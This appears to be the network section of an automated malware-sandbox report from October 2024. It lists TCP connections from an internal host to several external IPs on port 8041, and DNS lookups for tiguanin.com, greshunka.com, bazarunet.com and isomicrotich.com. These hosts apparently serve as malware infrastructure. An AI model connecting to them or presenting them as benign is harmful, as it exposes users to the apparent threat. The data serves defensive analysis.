                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.372529984 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.376986027 CEST80414974480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.377474070 CEST80414974580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.377549887 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.377686977 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.382755995 CEST80414974580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.382805109 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.461200953 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.466178894 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.466253996 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.475544930 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.480364084 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128494024 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128561974 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128752947 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128796101 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128864050 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.129240036 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.134906054 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.135353088 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.135416985 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.135732889 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.141911030 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771469116 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771528006 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771876097 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771960974 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.772150040 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.772263050 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.778678894 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.778826952 CEST80414974980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.778892994 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.779036045 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.786170959 CEST80414974980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.786223888 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.861843109 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.868472099 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.868624926 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.869337082 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.874131918 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.503974915 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.503992081 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.504076958 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.504342079 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.504704952 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.510943890 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.510956049 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.511085987 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.511584044 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.517363071 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133115053 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133205891 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133243084 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133275032 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133625031 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133996010 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.139954090 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.140238047 CEST80414975280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.140455008 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.140574932 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.830517054 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.831413031 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.835418940 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.836235046 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:27.124950886 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:27.125025034 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.163901091 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.164303064 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169008017 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169106960 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169258118 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169315100 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169652939 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.174455881 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.768702984 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.768788099 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.769318104 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.774064064 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.808207989 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.814054012 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.814201117 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:30.871269941 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.031656981 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.034148932 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.035957098 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.040890932 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673386097 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673466921 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673999071 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.674031973 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.674081087 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.674750090 CEST497678041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.680747032 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.681693077 CEST80414976780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.681761026 CEST497678041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.682492971 CEST497678041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.691792011 CEST80414976780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.333218098 CEST80414976780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.333328962 CEST497678041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.334099054 CEST497678041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.334140062 CEST80414976780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.334328890 CEST497678041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.334331036 CEST497688041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.340080023 CEST80414976780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.340091944 CEST80414976880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.340214968 CEST497688041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.340347052 CEST497688041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.346651077 CEST80414976880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:32.346812963 CEST497688041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:34.447268963 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:34.452878952 CEST80414976982.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:34.459275961 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:34.480510950 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:34.485409021 CEST80414976982.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.102443933 CEST80414976982.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.102600098 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.103281021 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.108150959 CEST80414976982.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.108273029 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.113471031 CEST80414976982.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:35.113604069 CEST497698041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.188925028 CEST497708041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.193876028 CEST80414977080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.193937063 CEST497708041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.197951078 CEST497708041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.202725887 CEST80414977080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.854662895 CEST80414977080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.854835033 CEST497708041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.854971886 CEST80414977080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.855047941 CEST497708041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.855283976 CEST497708041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.855645895 CEST497718041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.860914946 CEST80414977080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.860951900 CEST80414977180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.861195087 CEST497718041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.863270044 CEST497718041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.868098974 CEST80414977180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.871270895 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.878190041 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:40.878489971 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.495584011 CEST80414977180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.495641947 CEST497718041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.495647907 CEST80414977180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.495692968 CEST497718041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.509890079 CEST497718041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.510268927 CEST497728041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.514904976 CEST80414977180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.515269041 CEST80414977280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.515363932 CEST497728041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.515629053 CEST497728041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.521151066 CEST80414977280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:41.521754026 CEST497728041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.127825022 CEST49773443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.127851009 CEST44349773188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.127899885 CEST49773443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.128232002 CEST49773443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:42.128246069 CEST44349773188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:49.880862951 CEST49781443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:49.880893946 CEST44349781188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.249303102 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.249360085 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.253464937 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.257338047 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.257350922 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.738749981 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.738852024 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.739406109 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.739413023 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.741997957 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.742002964 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:50.931421041 CEST497838041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.851718903 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.851773024 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.851788998 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.851814985 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.851834059 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.851854086 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.853406906 CEST49782443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.853420973 CEST44349782188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.856125116 CEST80414978380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.856203079 CEST497838041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.884370089 CEST497838041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:51.889450073 CEST80414978380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.263287067 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.263335943 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.263441086 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.263797045 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.263807058 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.557792902 CEST80414978380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.557914019 CEST80414978380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.562870026 CEST497838041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.567291975 CEST497838041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.570331097 CEST497858041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.572433949 CEST80414978380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.575331926 CEST80414978580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.581371069 CEST497858041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.585196018 CEST497858041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.590344906 CEST80414978580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.890718937 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.890872002 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.891784906 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.891797066 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.892456055 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:52.892468929 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264579058 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264638901 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264650106 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264666080 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264708996 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264708996 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264884949 CEST49784443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.264900923 CEST44349784188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.300137043 CEST80414978580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.300585985 CEST497858041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.300698996 CEST80414978580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.300980091 CEST497858041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.301399946 CEST497858041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.301997900 CEST497868041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.306164026 CEST80414978580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.306757927 CEST80414978680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.307018042 CEST497868041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.307202101 CEST497868041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.312078953 CEST80414978680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.312349081 CEST497868041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.393649101 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.393690109 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.393739939 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.394020081 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.394036055 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.943403006 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.943461895 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.943994045 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.944000006 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.945506096 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:53.945511103 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.396855116 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.396960020 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.396996021 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.397388935 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.397424936 CEST49787443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.397439957 CEST44349787188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491312027 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491403103 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491591930 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491888046 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.491904974 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.959182024 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.959781885 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.960511923 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.960540056 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.963315010 CEST49788443192.168.2.9188.114.96.3
                                                                                                                                                                                                                          Oct 3, 2024 20:46:54.963329077 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412214041 CEST44349788188.114.96.3192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:55.412307024 CEST44349788188.114.96.3192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 20:45:10.034882069 CEST | 192.168.2.9 | 1.1.1.1 | 0x5ffe | Standard query (0) | tiguanin.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:45:11.440717936 CEST | 192.168.2.9 | 1.1.1.1 | 0x78b2 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:45:12.449753046 CEST | 192.168.2.9 | 1.1.1.1 | 0x78b2 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:45:13.859194040 CEST | 192.168.2.9 | 1.1.1.1 | 0x45b4 | Standard query (0) | bazarunet.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:41.933881044 CEST | 192.168.2.9 | 1.1.1.1 | 0xd6c1 | Standard query (0) | isomicrotich.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 20:45:10.048582077 CEST | 1.1.1.1 | 192.168.2.9 | 0x5ffe | No error (0) | tiguanin.com | | 80.78.24.30 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:45:12.718703985 CEST | 1.1.1.1 | 192.168.2.9 | 0x78b2 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:45:12.724982023 CEST | 1.1.1.1 | 192.168.2.9 | 0x78b2 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:45:14.032295942 CEST | 1.1.1.1 | 192.168.2.9 | 0x45b4 | No error (0) | bazarunet.com | | 80.78.24.30 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:42.126965046 CEST | 1.1.1.1 | 192.168.2.9 | 0xd6c1 | No error (0) | isomicrotich.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:46:42.126965046 CEST | 1.1.1.1 | 192.168.2.9 | 0xd6c1 | No error (0) | isomicrotich.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false

• isomicrotich.com

